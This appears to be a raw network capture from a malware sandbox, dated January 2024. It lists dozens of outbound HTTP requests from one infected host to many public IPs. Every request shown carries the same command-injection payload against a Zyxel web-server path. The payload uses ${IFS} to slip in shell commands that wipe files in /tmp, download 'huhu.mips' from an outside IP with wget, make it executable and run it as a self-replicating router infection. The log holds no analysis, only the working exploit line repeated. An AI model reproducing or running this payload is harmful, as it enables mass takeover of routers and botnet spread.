                                      Jan 19, 2024 17:29:17.459753990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      595192.168.2.1435282144.54.121.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459786892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      596192.168.2.1460154113.130.155.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459825993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      597192.168.2.145272482.165.77.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459847927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      598192.168.2.1437532223.86.24.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459872007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      599192.168.2.145412458.69.73.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459914923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      600192.168.2.145489899.44.207.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459944010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      601192.168.2.1437024108.167.67.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459980965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      602192.168.2.1436016176.93.28.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460007906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      603192.168.2.143969693.104.133.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460055113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      604192.168.2.1457246200.209.181.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460087061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      605192.168.2.143644248.82.11.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460114956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      606192.168.2.145302427.183.218.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460144997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      607192.168.2.1454684166.83.181.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460191965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      608192.168.2.1437074187.67.240.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460237026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      609192.168.2.1450434129.40.19.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460266113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      610192.168.2.1459652139.215.69.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460326910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      611192.168.2.145201693.196.26.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460341930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      612192.168.2.1443494206.185.76.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460392952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      613192.168.2.1447220115.90.73.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460419893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      614192.168.2.1432940107.7.159.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460444927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      615192.168.2.145125870.202.220.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460489988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      616192.168.2.1435778164.55.48.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460526943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      617192.168.2.143542485.206.14.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460561991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      618192.168.2.1454232135.59.147.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460571051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      619192.168.2.145945875.208.250.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460599899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      620192.168.2.144173469.33.214.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460669994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      621192.168.2.1455012221.76.56.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460685015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      622192.168.2.1437246179.197.62.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460741043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      623192.168.2.1440860187.106.104.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460773945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      624192.168.2.1433392143.69.249.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460819960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      625192.168.2.145099817.197.216.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460861921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      626192.168.2.1449358213.128.194.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460906982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      627192.168.2.143945283.133.193.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460942030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      628192.168.2.1459062129.155.172.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.460999966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      629192.168.2.1452366213.146.239.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461013079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      630192.168.2.1436408221.249.69.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461045980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      631192.168.2.1432974153.224.247.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461103916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      632192.168.2.1456170134.164.77.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461119890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      633192.168.2.1456312115.71.55.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461150885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      634192.168.2.1447804151.237.73.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461185932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      635192.168.2.145538670.44.124.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461224079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      636192.168.2.1438934154.56.36.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461257935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      637192.168.2.1447820121.177.253.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461309910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      638192.168.2.1449862142.233.178.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461340904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      639192.168.2.144029614.43.11.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461389065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      640192.168.2.143886465.49.189.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461431980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      641192.168.2.1441396188.41.165.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461479902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      642192.168.2.1459188145.230.65.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461512089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      643192.168.2.1436004103.184.231.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461579084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      644192.168.2.144731618.211.201.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461599112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      645192.168.2.146095251.218.63.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461641073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      646192.168.2.1438094111.198.193.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461683035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      647192.168.2.1435826101.74.50.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461704969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      648192.168.2.1445952105.204.59.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461731911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      649192.168.2.1441698131.24.171.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461786985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      650192.168.2.145245090.8.233.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461829901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      651192.168.2.1439956148.77.90.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461860895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      652192.168.2.14532965.111.60.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461908102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      653192.168.2.143292071.95.146.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461941957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      654192.168.2.1440754174.54.100.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.461988926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      655192.168.2.1435858177.91.17.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462048054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      656192.168.2.145455258.59.23.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462065935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      657192.168.2.1457406195.1.178.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.462094069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      658192.168.2.1458588168.119.56.132443
                                      TimestampBytes transferredDirectionData
